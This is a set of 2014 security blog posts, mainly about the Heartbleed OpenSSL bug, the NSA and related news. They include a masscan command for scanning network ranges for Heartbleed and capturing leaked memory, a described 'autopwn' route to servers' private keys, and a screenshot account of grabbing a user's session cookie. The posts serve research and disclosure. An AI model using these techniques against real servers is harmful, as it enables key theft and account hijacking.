Monday, April 14, 2014

Heartbleed: I'm thinking BIGNUM

On Friday night, I started up my 'heartleech' program slurping down data from www.cloudflarechallenge.com at 30-mbps, then went to bed. The next day, I had over 100-gigabytes of data, but I couldn't find the private key. What was the bug in my code that prevented me from finding it? I spent two days trying to solve this problem, it was very frustrating.

The answer was "byte-order". I was looking for the prime factor in the same way that it'd appear in a DER0-encoded file, which is "big-endian". Instead, the way to look for the key is in little-endian format.

I've misread the OpenSSL code before, but my feeling is that this comes from the "BIGNUM" representation in OpenSSL. RSA key and it's constituent factors are all just integers that are thousands of bits long. Because they don't fit in normal 64-bit integers, they require a special library to manipulate them. The big-endian byte arrays are extracted from the private key file, then converted into the internal representation, at which point you can call functions to add, subtract, multiply, and so on.

The internal representation for OpenSSL is as a series of integers, with low-order integers first. Since the integers on Intel x86 are also little-endian, this means that the internal representation is just byte-swapped from the external form. This would not be the case on something like Solaris SPARC, which has big-endian integers. OpenSSL still stores the array of integers least-significant first, but each integer itself will be big-endian.

My guess is that the reason we can find the prime factors is that there is some BIGNUM memory sitting around that shouldn't be.

What's really annoying is that I started down this BIGNUM path, but then some other people won the www.cloudeflarechallenge.com using Python scripts. I therefore made the assumption that Python used an external big-endian form, so I chose that instead. I then tested my code and successfully found the prime factors when reading from DER encoded private key files. So I knew my code was correct. But then my code didn't find the prime factors in the data I dumped from CloudFlare. Moreover, I couldn't test their Python scripts, because the files I created from the dumps were 13-gigs in size. Their scripts would first read in the entire file before parsing it -- and would barf at 13-gigs. I have some small 400-meg files -- but none of them contain the key. Sigh.



CloudFlare Challenge writeup

Last week, I made an embarrassing mistake. I misread the OpenSSL code and claimed getting the private-key would be unlikely. This was wrong on so many levels.

Well, today I'm demonstrating the opposite, that anybody can easily get a private-key. Just run my "heartleech" program with the "-a" (autopwn) against a server, go away from your computer for many hours, and when you come back, you'll have the key.

CloudFlare has been nice enough to put up an unpatched server, challenging people to get it's key. This is easy with the autopwn feature of heartleech, as shown in this screenshot.


Friday, April 11, 2014

No, the NSA didn't make us less secure (heartbleed)

According to a Bloomberg story, the NSA has known about the #heartbleed bug from the moment it was written, presumably because they analyze commits to security packages looking for such bugs. Many have opined that this makes us less safe.

It doesn't. The NSA didn't create the hole. They didn't hinder any other researcher from finding it. If the NSA wasn't looking for the bug, the outcome would be the same.

Finding such bugs and keeping them quiet is wholly within the NSA's mission statement. Their job is to spy on foreigners and keep state secrets safe. Generally, state secrets aren't on machines exposed to the Internet, so keeping the bug secret had no impact on that.

Many think the NSA should do a different job than commanded by the President. That's called "treason". That the NSA, CIA, and the military do exactly what they are told is what distinguishes them from other agencies. Former military head Robert Gates pointed that out in his recent memoir: the reason Presidents like Obama love the military and intelligence agencies is that they are the only groups who do what they are told. There are many problems with the NSA, but that they stay on mission isn't one of them.

Maybe we should have a government agency dedicated to critical cyber infrastructure protection, whose job it would be to find and fix such bugs. Maybe we ought to have a government agency that looks at every commit to the OpenSSL source code, notifying the developers of any problems they find. In theory, the DHS already does that, but of course they are hapless with regards to cybersecurity.

There are reasons to be critical of the NSA. They pay for vulnerabilities, raising the market price of bounties responsible companies like Google have to pay. They hire away talent to look for vulnerabilities, leaving fewer talented people outside the NSA. So in that way, they make everyone else less safe. But the same thing happens elsewhere. After the worms of around 2003, Microsoft hired more than half the talented researchers in the industry, either directly or through consultants, which had the effect of making everyone else less secure. Today, Google and Apple employ lots of talented researchers. The distortions that the NSA causes in the market is less than private enterprise.

The reason to hate the NSA is not because they are following their mission, it's because their mission has creeped to include surveilling American citizens. We need to stop making them the bogyman in every story and focus on the real reasons to hate them.


Weev freed (for now)

The court has overturned the Weev conviction, but on the question of venue not the vague language of the CFAA. This is actually just as important. I discuss the "Venue Question" in this blog post about the appeal. Orin Kerr has his description here.

If we are lucky, Weev'll get retried in California, where the hack occurred, and we'll get the crazy Judge Kozinski to rule on the vagueness of the CFAA.

Wednesday, April 09, 2014

No, we weren't scanning for hearbleed before April 7

This webpage claims that people were scanning for #heartbleed before the April 7 disclosure of the bug. I doubt it. It was probably just masscan.

The trick with masscan, which makes it different from all other scanners, is that it has a custom TCP/IP stack and a custom SSL stack. When it scans a machine for SSL, it abruptly terminates the connection in the middle of the handshake. This causes no problems, but it's unusual, so servers log it.

The #heartbleed scanners have even less SSL. They just dump raw bytes on the wire and pattern-match the result. They, too, abruptly terminate the connection in the middle of handshaking, causing the same server log messages.

Masscan is really good at doing SSL surveys of the entire Internet, and a lot of people have been using it for that. The tool is only 6 months old, so it's something new in your logs. Two new things producing the same error messages might seem like the two are correlated, but of course, they aren't.


Why heartbleed doesn't leak the private key [retracted]

I got this completely wrong!

So as it turns out, I completely messed up reading the code. I don't see how, but I read it one way. I can still visualize the code in my mind's eye that I thought I read -- but it's not the real code. I thought it worked one way, but it works another way.

Private keys are still not so likely to be exposed, but still much more likely than my original analysis suggested.

600,000 servers vulnerable to heartbleed

Just an update on "HeartBleed". Yesterday I updated my "masscan" program to scan for it, and last night we scanned the Internet. We found 28,581,134 machines (28-million) that responded with a valid SSL connection. Of those, only 615,268 (600-thousand) were vulnerable to the HeartBleed bug. We also found 330,531 (300-thousand) machines that had heartbeats enabled, but which did not respond to the heartbleed attack. Presumably, this means a third of machines had been patched by the time we ran the scan last night.

Update: Some people have described this as "only 2% vulnerable". That's an unfair way of describing it. We scanned IP addresses. There are millions of IP addresses where port 443 traffic is redirected to a single load balancer. This throws off our counts.

Yes, you might have to change some passwords (#heartbleed)

There is some debate over whether this "HeartBleed" bug means you have to change your password. It might.

The HeartBleed bug grabs some random bits of memory. If a hacker wrote a script that would repeatedly query "login.yahoo.com" a thousand times per second, they'd probably get a hundred usernames/passwords per second.

Usernames and passwords go in HTTP requests just like cookies and URLs. If one is exposed, then so is the other. As I posted yesterday, here is a picture of grabbing part of a session cookie from a real website (Flickr, one of Yahoo's properties):


Luckily, sessions remain open for weeks, but the bug was only open for a couple of days. The only passwords you need to change would be ones that you entered in the last couple of days. Personally, I haven't entered any passwords over the last couple days, so I don't need to change any passwords.

At most, since hackers could have stolen the session cookies, you might want to log out and relogin to sessions on vulnerable servers.



From this article:
"I would change every password everywhere because it's possible something was sniffed out," said Wolfgang Kandek, chief technology officer for Qualys
This is nonsense. If you didn't type in your password over the last few days, then you are likely safe. I've got hundreds of accounts, I'm changing none of them, because I didn't have to relogin over the last few days. I had persistent sessions.

Tuesday, April 08, 2014

Using masscan to scan for heartbleed vulnerability

I've updated my port scanner, "masscan", to specifically look for Neel Mehta's "HeartBleed" vulnerability. Masscan is good for scanning very large networks (like the network).

Remember that the trick with masscan is that it has its own TCP/IP stack. This means that on Linux and Mac OS X (but not Windows), the operating system will send back RST packets in acknowledgement to a SYN-ACK. Therefore, on Linux, you have to either configure firewall rules to block out a range of ports that masscan can use without generating resets, or better yet, just set masscan to "spoof" an otherwise unused IP address on the local network.

Here is how you might use it:

masscan 10.0.0.0/8 -p443 -S 10.1.2.53 --rate 100000 --heartbleed

This translates to:

  • 10.0.0.0/8 = the network you want to scan, which is all 10.x.x.x
  • -p443 = the port(s) you want to scan, in this case, the ones assigned to SSL
  • -S 10.1.2.53 = an otherwise unused local IP address to scan from
  • --rate 100000 = 100-packets/second, which scans the entire Class A range in a few minutes
  • --heartbleed = the new option that reconfigures masscan to look for this vulnerability


The output on the command-line will look like the following:

Discovered open port 443/tcp on 10.20.30.143
Banner on port 443/tcp on 10.20.30.143: [ssl] cipher:0xc014
Banner on port 443/tcp on 10.20.30.143: [vuln] SSL[heartbeat] SSL[HEARTBLEED]

There are three pieces of output for each IP address. The first is that the open port exists (the scanner received a SYN-ACK). The second is that the SSL exists, that the scanner was able to get back a reasonable SSL result (reporting which cipher suite it's using). The third line is the "vulnerability" information the scanner found. In this case, it's found two separate vulnerabilities. The first is that SSL "heartbeats" are enabled, which really isn't a vulnerability, but something some people might want to remove from their network. The second is the important part, notifying you that that the "HEARTBLEED" vulnerability exists (in all caps, 'cause it's important).

Some researchers would like to capture the bled (disclosed) information. To do that, add the option "--capture heartbleed" to the command-line. This will add a fourth line of output per IP address:

Banner on port 443/tcp on 10.20.30.143: [heartbleed] AwJTQ1uQnZtyC7wMvCuSqEiXz705BMwWCoUDkJ93BDPU...

This line will be BASE64 encoded, and be many kilobytes in size (I think masscan truncates it to the first 4k).




What the heartbleed bug looks like on the wire

The "heartbleed" bug appears to grab "uninitialized memory". For typical web servers using OpenSSL, that likely means memory dealing with recent web requests. In the attached screen shot, we ran a test tool against Flickr (which is still vulnerable). Notice that it gives us a person's session cookie (which I've cropped here to avoid harming the innocent). By copying this cookie into a browser ("sidejacking") we can in theory gain temporary access to this person's account.

A picture of the packets sent to test/exploit the HeartBleed bug.
At the bottom, you see part of a person's session cookie.
I think for any particular connection, the chance of getting a "private key" is very low. But of course, if it's only a 1-in-a-million chance, then it's still too high, as attackers can create millions of connections to a server. Also, the impact for a large hosting site like Flickr would be huge, impacting hundreds of millions of connections. In other words, if "risk = likelihood * impact", then the risk of a private-key disclosure is the same as the risk of a cookie disclosure: the impact of disclosing the private-key effects all hundred million customers with a one-in-a-million likelihood, whereas the impact of a session key disclosure effects only one customer, with a greater than 50% chance per coonection.




Tuesday, April 01, 2014

New Service Offering from Errata Security: SATAN-as-A-Service

We have been collecting data on security breaches, vulnerabilities, and attitudes towards security. One conclusion we derived from analyzing this data is there were far less security problems, that we knew of, in 1995 than today. What is so different about today that 1995? One major difference is SATAN is not as widely used. The controversial security tool by notable cyber cafe attendees Dan Farmer and Wietse Venema.

We decided to take action:

Today we are announcing Satan-as-A-Service.


SATAN running on a deployable image of Kali Linux:




We are staying faithful to the original vision of SATAN. Ou first action will be to finish this TODO list:
TODO list for future (SATAN version 1.1, 2.0, whatever)
----------------------------------------------------------
o       Enable SATAN to fork and run several scans in parallel
o       Talk about sending mail/syslog to each host scanned
o       Look at and deal with subnet masks properly...
o       Put in a DNS walker
o       fix rex client strategy (rex client is currently not being used)
o       get a more complete list of banners from vendors and Internet
       on what is vulnerable and not, for the rules/* files.
o       many more bug tests, etc.
o       Add AFS testing support; currently there is none
o       Add SNMP testing/probing
And most importantly:
o       MAPS!  Big graphical maps that can *show* the relationships
       and are clickable to let users zoom into things, etc...

Thursday, March 27, 2014

A traditional cybersecurity company

Picture of the loft, from Space Rogue.
This is the tradition.
In the prosecutors' response to the Weev appeal, they make the snarky claim about Goatse security:
It is not, to put it mildly, a traditional security research company. The firm’s name is a reference to a notoriously obscene internet shock site. ...  Goatse Security’s corporate motto is “gaping holes exposed.” 
They are wrong. This is traditional, at least for security research companies. We start out as hobbyists having fun, not taking what we do seriously. We start wearing t-shirts and hoodies. Only as we grow older do we realize that people will pay serious money for this, and it becomes our formal job, where we might show up to meetings wearing a suit.

Wednesday, March 26, 2014

We may have witnessed a NSA "Shotgiant" TAO-like action

Last Friday, the New York Times reported that the NSA has hacked/infiltrated Huawei, a big Chinese network hardware firm. We may have witnessed something related to this.

In 2012, during an incident, we watched in real time as somebody logged into an account reserved for Huawei tech support, from the Huawei IP address space in mainland China. We watched as they executed a very narrow SQL query targeting specific data. That person then encrypted the results, emailed them to a Hotmail account, removed the log files, and logged out. Had we not been connected live to the system and watched it in real-time, there would have been no trace of the act.

The compelling attribute of the information they grabbed is that it was useful only to American intelligence. The narrowness of the SQL query clearly identified why they wanted the data. It wasn't support information, something that a support engineer would want. It wasn't indiscriminate information, something a hacker might grab. It wasn't something that would interest other intelligence services -- except to pass it on to the Americans.

I point this out to demonstrate the incompleteness of the New York Times story. The story takes the leaked document with the phrase "Leverage Huawei presence to gain access to networks of interest" and assumes it's referring to the existing narratives of "hardware backdoors" or "finding 0days". In fact, these documents can mean so much more, such as "exploiting support contracts".

A backdoor or 0day for a Huawei router would be of limited use to the NSA, because the control ports are behind firewalls. Hacking behind firewalls would likely give full access to the target network anyway, making any backdoors/0days in routers superfluous.

But embedding themselves inside the support infrastructure would give the NSA nearly unlimited access to much of the world. Huawei claims that a third of the Internet is running their devices. Almost all of it is under support contract. These means a Huawei support engineer, or a spy, can at any time reach out through cyberspace and take control of a third of the Internet hardware, located in data centers behind firewalls. Most often, it's the Huawei device or management server the NSA would target. In other cases, the Huawei product is just one hop away from the desired system, without a firewall in between.

You want to know who the Pakistani president called in the hours after the raid on the Bin Laden compound? Easy, just use the Huawei support account to query all the telephone switches. You want the contents of Bashar al-Assad's emails? Easy, just log into the Huawei management servers that share accounts with the email servers.

This isn't a just Huawei issue, but a universal principle of hacking. An example of this was last Christmas's breach of the retailer Target, where 40 million credit cards were stolen by hackers. Apparently, hackers first breached the HVAC (air conditioning) company, then leveraged their VPN connection to the Target network to then hacking into servers.


By the way, I doubt this was actually the NSA. It's more likely the CIA, who has "assets" at Huawei (support engineers they've bribed), or the intelligence service for a friendly country. The intelligence community is so huge it'd be unreasonable to assume the NSA is lurking behind every rock. I'm just pointing out that there are other ways to interpret that NYTimes story.